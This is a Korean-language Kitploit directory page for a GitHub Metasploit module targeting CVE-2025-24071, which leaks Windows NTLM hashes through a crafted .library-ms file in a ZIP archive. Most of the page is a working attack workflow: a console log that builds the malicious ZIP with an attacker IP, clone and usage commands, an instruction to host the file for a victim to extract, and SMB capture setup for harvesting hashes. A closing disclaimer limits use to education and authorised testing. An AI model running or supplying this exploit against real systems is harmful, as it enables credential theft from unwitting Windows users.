Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/zbs54/blackash-cve-2025-24071
Exploit FrameworksPayload GenerationVulnerability AnalysisExploitationInformation GatheringPenetration Testing
GitHubzbs54/blackash-cve-2025-24071

Blackash-CVE-2025-24071

CVE-2025-24071

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Blackash-CVE-2025-24071

CVE-2025-24071: .library-ms 파일을 통한 NTLM 해시 유출, Metasploit 모듈 🚨

설명

Windows 파일 탐색기에서 권한 없는 행위자에게 민감한 정보가 노출되면 권한 없는 공격자가 네트워크를 통해 스푸핑을 수행할 수 있습니다.

지표

CNA: Microsoft Corporation 기본 점수: 6.5 중간 🟠 벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

개요

이 취약점은 사용자가 특수하게 조작된 .library-ms 파일이 포함된 ZIP 아카이브를 추출할 때 발생합니다. Windows 탐색기는 파일에 지정된 원격 서버로 SMB 인증 요청을 자동으로 시작하여 사용자의 상호 작용 없이 NTLM 해시를 유출합니다.

이 Metasploit 모듈은:

  1. 악성 .library-ms 파일을 생성합니다.
  2. ZIP 아카이브로 압축합니다.
  3. NTLM 해시를 수집하기 위해 Metasploit의 SMB 캡처 기능과 통합합니다.
root@kitploit:~
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v6.4.64-dev                          ]
+ -- --=[ 2519 exploits - 1296 auxiliary - 431 post       ]
+ -- --=[ 1616 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/server/ntlm_hash_leak
msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 192.168.1.1
ATTACKER_IP => 192.168.1.1
msf6 auxiliary(server/ntlm_hash_leak) > set FILNAME exploit.zip
FILNAME => exploit.zip
msf6 auxiliary(server/ntlm_hash_leak) > set LIBRARY_NAME malicious.library-ms
LIBRARY_NAME => malicious.library-ms
msf6 auxiliary(server/ntlm_hash_leak) > set SHARE_NAME shared
set SHARE_NAME => shared
msf6 auxiliary(server/ntlm_hash_leak) > run
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed
도구 다운로드

설치:

  1. 저장소를 클론합니다:
root@kitploit:~
git clone https://github.com/B1ack4sh/Blackash-CVE-2025-24071.git
cd CVE-2025-24071

사용법:

  1. 모듈을 로드합니다:
root@kitploit:~
use auxiliary/server/ntlm_hash_leak
  1. 필요한 옵션을 설정합니다:
root@kitploit:~
set ATTACKER_IP 192.168.1.162           # Replace with your IP address
set FILENAME exploit.zip                # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms   # Name of the .library-ms file
set SHARE_NAME shared                   # SMB share name
  1. 모듈을 실행합니다 :
root@kitploit:~
run
  1. 모듈이 악성 ZIP 파일(exploit.zip)을 생성합니다. 이 파일을 호스팅하여 피해자가 다운로드하고 압축을 해제하도록 하십시오.
  2. NTLM 해시를 수집하려면 Metasploit의 SMB 캡처 모듈을 사용합니다:
root@kitploit:~
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
run

면책 조항 ⚠️

교육 및 연구 목적으로만 사용하십시오. 소유하거나 테스트 권한이 있는 시스템에만 사용하십시오.